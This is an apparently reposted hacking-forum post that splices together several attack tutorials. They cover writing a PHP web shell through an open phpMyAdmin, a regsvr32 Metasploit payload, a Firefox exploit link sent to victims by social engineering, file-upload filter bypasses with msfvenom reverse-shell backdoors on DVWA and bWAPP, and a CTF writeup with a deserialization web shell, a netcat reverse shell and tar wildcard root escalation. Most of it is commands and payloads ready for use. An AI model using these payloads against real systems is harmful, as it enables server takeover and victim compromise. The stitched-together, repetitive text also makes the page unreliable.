Login

**NINZA** · 04-26-2020, 09:33 AM

0			0

In this tutorial, we will learn how to exploit a web server if we found the phpmyadmin panel has been left open. Here I will try to exploit phpmyadmin which is running inside the localhost “xampp” by generating a SQL query to execute malicious code and then make an effort to access the shell of victim’s Pc.
PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.
Features

Intuitive web interface
Support for most MySQL features:
browse and drop databases, tables, views, fields, and indexes
create, copy, drop, rename and alter databases, tables, fields, and indexes
maintenance server, databases, and tables, with proposals on server configuration
execute, edit and bookmark any SQL-statement, even batch-queries
manage MySQL user accounts and privileges
manage stored procedures and triggers
Import data from CSV and SQL
Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 – OpenDocument Text and Spreadsheet, Word, LATEX, and others
Administering multiple servers
Creating graphics of your database layout in various formats
Creating complex queries using Query-by-example (QBE)
Searching globally in a database or a subset of it
Transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link

For information visit:

[To see content please register here]

Let’s start!!!
Open the localhost address:192.168.1.101:81 in the browser and select the option phpmyadmin from the given list of xampp as shown the following screenshot.
[Image: 1.png?w=687&ssl=1]

When you come into PhpMyAdmin application, here you will find different areas. On the left side of the screen, you can see the list of database names. As we are inside the administration console where we can perform multiple tasks which I have defined above, therefore, I am going to create a new database
Now click on new to create a database.
[Image: 2.png?w=687&ssl=1]

Give a name to your database as I have given Ignite technologies and click on create.
[Image: 3.png?w=687&ssl=1]

Now you can see the database ignite technologies has been added in the list of databases.
[Image: 3.png?w=687&ssl=1]

Click on ignite technologies database to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.
[Image: 4.png?w=687&ssl=1]

Click on ignite technologies database to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.
[Image: 5.png?w=687&ssl=1]

Now, this is an interesting part because here I am going to execute malicious code as SQL query which will create a command shell vulnerability inside the web server.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
1
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.
[Image: 6.png?w=687&ssl=1]

Now type the following URL to find whether we are successful or not in order to create OS command shell vulnerability.

[To see content please register here]

1

[To see content please register here]

Awesome!!! You can see it has given a warning which means we had successfully created OS command shell vulnerability.
[Image: 7.png?w=687&ssl=1]

[To see content please register here]

1

[To see content please register here]

When you execute the above URL in the browser you will get the information of victim‘s PC directories.
[Image: 9.png?w=687&ssl=1]

Next step will achieve a meterpreter session of victim’s Pc. Open another terminal in Kali Linux and type following command. msfconsole
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
1
2
3
4
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
Copy the selected part for the DLL file and use this malicious code as the command inside the URL.
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll
1
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll
[Image: 10.png?w=687&ssl=1]

Paste the above code the URL and execute it which will give a meterpreter session on Metasploit

[To see content please register here]

/s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll
1

[To see content please register here]

/s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll
[Image: 11.png?w=687&ssl=1]

From the following screenshot, you can see meterpreter session 1 opened.
[Image: 12.png?w=687&ssl=1]

sessions –i 1
meterpreter>sysinfo
1
2
sessions –i 1
meterpreter>sysinfo
[Image: 13.png?w=687&ssl=1]

This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.
Exploit Targets
Firefox 38
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
[Image: 1.png?w=687&ssl=1]

Now type use exploit/windows/browser/firefox_smil_uaf
msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_smil_uaf)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_smil_uaf)>set srvhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_smil_uaf)>set uripath / (IP of Local Host)
msf exploit (firefox_smil_uaf)>exploit
[Image: 2.png?w=687&ssl=1]

Now an URL you should give to your victim

[To see content please register here]

victim via chat or email or any social engineering technique.
[Image: 3.png?w=687&ssl=1]

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
[Image: 4.png?w=687&ssl=1]

File upload vulnerability is a major problem with web-based applications. In many web servers, this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.
An attacker may reveal internal information of web server to others and in some chances to sensitive data might be informal, by unauthorized people.
In this tutorial, we are going to discuss various types of file upload vulnerability and then try to exploit them. You will learn the different injection techniques to upload a malicious file of php in a web server and exploit them.
Basic file upload
In this scenario a simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions to be uploaded.
For example, if the server allows uploading a text file or image, which is considered as data and if security parameter is low whereas no restrictions on the content-type or filename then you can easily bypass malicious php file which is considered an application in the web server.
Let’s start!!!
Click on DVWA Security and set Website Security Level low
Open a terminal in Kali Linux and create php backdoor through the following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw
Copy and paste the highlighted code in leafpad and save as with PHP extension as img.php on the desktop.
Load Metasploit framework type msfconsole and start multi handler.
[Image: 0.png?w=687&ssl=1]

Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click on browse tag to browse the img.php file to upload it on the web server and click on upload which will upload your file on web server.
[Image: 1.png?w=687&ssl=1]

After uploading the PHP file it will show the path of the directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.
hackable/uploads/img.php
1
hackable/uploads/img.php
[Image: 2.png?w=687&ssl=1]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
1
2
3
4
5
6
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
You can observe, I have got meterpreter session 1 of victim PC on the Metasploit.
[Image: 3.png?w=687&ssl=1]

Double Extension injection Technique
Click on DVWA Security and set Website Security Level medium
Here we come across a situation where it would check the file extension. In medium security it only allows .jpeg and .png extension file to be uploaded on the web server and restricts other files with single file extension while uploading in the web server. Now there are some techniques through which we will bypass the malicious PHP file in the web server.
[Image: 4.1.png?w=687&ssl=1]

It is an attempt to hide the real nature of a file by inserting multiple extensions with a filename which creates confusion for security parameters. For example, img1.php.png look like png image which is a data, not an application but when the file is uploaded with the double extension it will execute a php file which is an application.
Let’s continue!!!
Repeat same process to create the php backdoor with msfvenom and now save the file as img1.php.png on the desktop and run the multi handler at the background.
Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of the file as well as read the file name.
Click to file upload option from vulnerability menu. Again click on the browse button to browse the img1.php.png file to upload it. Now start burp suite and make intercept on under the proxy tab. Don’t forget to set manual proxy of your browser and click on upload.
[Image: 4.png?w=687&ssl=1]

Intercept tab will work to catch the sent request of the post method when you click to upload button. Now change img1.php.png into img1.php inside the fetched data.
[Image: 5.png?w=687&ssl=1]

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in the directory.
[Image: 6.png?w=687&ssl=1]

After uploading the PHP file it will show the path of the directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.
hackable/uploads/img1.php
1
hackable/uploads/img1.php
[Image: 7.png?w=687&ssl=1]

This’ll provide a meterpreter session 2 when you run URL in the browser.
meterpreter > sysinfo
1
meterpreter > sysinfo
[Image: 8.png?w=687&ssl=1]

Content-Type file Upload
“Content-Type” entity in the header of the request indicates the internal media type of the message content. Sometimes web applications use this parameter in order to recognize a file as a valid one. For instance, they only accept the files with the “Content-Type” of “text/plain”. It is possible to bypass this protection by changing this parameter in the request header using a web proxy.
Again repeat the same process to create the php backdoor with msfvenom and now save the file as img2.php on the desktop and run the multi handler at the background.
[Image: 9.png?w=687&ssl=1]

Start the burp suite and repeat the process for fetching the sent request. In the screenshot you can read the content- type for php file; now change this content type application/x-php into image/png to upload your php file.
[Image: 10.png?w=687&ssl=1]

From the below image, you can perceive the manipulation in content type which known as content-type injection technique.
[Image: 11.png?w=687&ssl=1]

Now copy the selected part and past it in URL to execute it.
hackable/uploads/img2.php
1
hackable/uploads/img2.php
[Image: 12.png?w=687&ssl=1]

This’ll provide a meterpreter session 3 when you run URL in the browser.
meterpreter > sysinfo
1
meterpreter > sysinfo
[Image: 13.png?w=687&ssl=1]

Null Byte Injection
Null Byte Injection is an exploitation technique which uses URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by ‘%00’ which in ASCII is a “(blank space). This injection process can alter the intended logic of the application and allow a malicious adversary to get unauthorized access to the system files.
Now here you will see I have inserted a string at the end of the extension and change that string into its hex value and then replace that hex value from null byte character ‘%00’. The reason behind inserting a null byte value is that some application servers scripting language still use c/c++ libraries to check the filename and content. In c/c++ a line ends with /00 is called null byte.
Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of the string and stop further reading of string.
Now create the php backdoor with msfvenom and now save the file as img3.php.jpg on the desktop and run the multi handler at the background.
[Image: 14.png?w=687&ssl=1]

Start the burp suite and repeat the process for fetching the sent request. It looks the same like double extension file but here the technique is quite different from double extension file uploading.
[Image: 15.png?w=687&ssl=1]

Add any string or alphabet as shown in the screenshot here and you will notice that in the highlighted text I have made a change in img3.php.jpg into img3.phpD.jpg, now follow the next step will be to modify this string into a null byte.
[Image: 16.png?w=687&ssl=1]

In next step we will decode the inserted string; now decode your string or alphabet as I had given ‘D’ now decodes it into a hex which will tell its hex value and from the screenshot, you can read its hex value is 44.
[Image: 17.png?w=687&ssl=1]

Now click on hex option under intercept which will display the hex value of intercepted data. Here you can read the hex value for the file name which I have highlighted. In order to null exploitation replace the hex value 44 from null byte value 00.
[Image: 18.png?w=687&ssl=1]

Now you can perceive the changes from the given screenshot where I have injected the null value in the place of hex value of our inserted string.
[Image: 19.png?w=687&ssl=1]

Then again you will view the raw data, now here you will find that the string ’D’ is changed into a null byte value.
[Image: 20.png?w=687&ssl=1]

Now, forward the intercepted data to exploit file upload through a null byte injection technique. Great!!! We have bypassed the medium security now copy the uploaded path and past it in URL to execute it.
[Image: 22.png?w=687&ssl=1]

When you will run the path it will give you reverse connection on Metasploit and from the given screenshot you can see I have got meterpreter session 4 also.
[Image: 23.png?w=687&ssl=1]

Blacklisting File Extensions
Next target is bwapp which is another web server Set security level medium, from the list box, choose your bug and select Unrestricted File Upload now and click on hack
Some sever side scripting language check .php extension at the filename and allow only those file which does not contain the .php extension. Here we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example, PHp or PHP3.
[Image: 24.png?resize=640%2C372&ssl=1]

Now create the php backdoor with msfvenom and now save the file as img4.php3 on the desktop and run the multi handler at the background.
Then browse img4.php3 to upload in web server and click on upload tab. Here in medium security, it will allow the php file to get upload on the web server and from the given screenshot you can see my php file is successfully uploaded. Now click on the link here and you will get a reverse connection at the multi handler.
[Image: 25.png?w=687&ssl=1]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
1
2
3
4
5
6
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
Great!!! You can see I have got meterpreter session 1.
[Image: 26.png?w=687&ssl=1]

Source:

[To see content please register here]

Today we are going to solve another CTF challenge “PIPE” of the vulnhub lab’s design by Mr. Sagi. The level of this challenge is not so tough and its difficulty level is labeled as a medium. Solving this lab will give you a good experience of penetration testing.
You can download it from here:

[To see content please register here]

Penetrating Methodologies:
Network Scanning (Nmap, Netdiscover)
Abusing HTTP service (Burp Suite)
Exploiting js serialization for remote code execution
Insert netcat reverse_shell payload
Spawn TTY shell
Wildcard privilege escalation
capture the flag

Let’s Begin!!
Start with the netdiscover command to identify target IP in the local network, in my network 192.168.1.104 is my target IP, you will get yours.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

Further, let’s enumerate open ports and protocols information of the target’s network with help of nmap following command:
nmap -p- -A 192.168.1.104 --open
1
nmap -p- -A 192.168.1.104 --open
And from here we get open ports 22, 80, 111, 54073
[Image: 2.png?w=687&ssl=1]

Now we will open target IP in the browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On the login window, it written “the site says: index.php” which we will be using later on.
[Image: 3.png?w=687&ssl=1]

Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of Firefox browser. It has intercepted data for the login page. Here we will change the HTTP-GET method into HTTP-POST.
[Image: 4.png?w=687&ssl=1]

As shown in the below image replace GET from POST/index.php and then forward the intercepted request.
[Image: 5.png?w=687&ssl=1]

Ok! To above step leads us to a website which shows a PIPE picture and a link below it to get Show artist info.
[Image: 6.png?w=687&ssl=1]

As we cannot see anything else on this web page so we opened the page source code. It shows an accessible directory scriptz/php.js in its script content.
[Image: 8.png?w=687&ssl=1]

Now open target IP with /scriptz in the browser, and you will notice some file or scripts are present here. Download both files for further enumeration.
[Image: 9.png?w=687&ssl=1]

So first we open php.js file here we found it is serializing some data and after that, we open log.php.bak which works with the js file for serialization.
Then I search in Google and found Deserialization vulnerabilities in JS
[Image: 10.png?w=687&ssl=1]

Now again returning to our original web page, and click on the link given below of the Pipe image and capture cookies that request in a burp.
[Image: 11.png?w=687&ssl=1]

Select the parameter and send it for decoding in the smart decoder, in the image below red highlighted text is decoded and the result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.
[Image: 12.png?w=687&ssl=1]

Now modify the param with the following code for remote code execution and then forward the request.
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" <?php echo '<pre>'; system($_GET['cmd']); echo '</pre>'; ?>";}
1
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" <?php echo '<pre>'; system($_GET['cmd']); echo '</pre>'; ?>";}
[Image: 13.png?w=687&ssl=1]

Check your shell.php file is uploaded in that accessible directory.
[Image: 14.png?w=687&ssl=1]

Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.
cmd=id
It will dump the id of current user i.e. www-data.
[Image: 15.png?w=687&ssl=1]

Now let’s try to spawn tty shell of the victim’s machine with help of netcat payload: nc 10.0.0.1 1234 -e /bin/bash 192.168.1.107 1234
[Image: 16.png?w=687&ssl=1]

Then start netcat listener and then execute the payload to spawn tty shell of victim’s machine.
nc -lvp 1234
1
nc -lvp 1234
As you can observe we have successfully compromised the target machine and run the following command for gaining root access.
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
Then we check for any cronjobs running on the system via cat command we can see a couple of cron jobs running which interest us. In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the below steps
cat /etc/crontab
cat /usr/bin/compress.sh
1
2
cat /etc/crontab
cat /usr/bin/compress.sh
[Image: 17.png?w=687&ssl=1]

cd /home/rene/backup
ls
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
ls -al /usr/bin/find
touch raj
find raj -exec "/bin/sh" \;
1
2
3
4
5
6
7
8
cd /home/rene/backup
ls
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
ls -al /usr/bin/find
touch raj
find raj -exec "/bin/sh" \;
Yuppie!! We got the root access.
[Image: 18.png?w=687&ssl=1]

At last open, the flag.txt file and we have our flag.
Mission accomplished!
[Image: 19.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis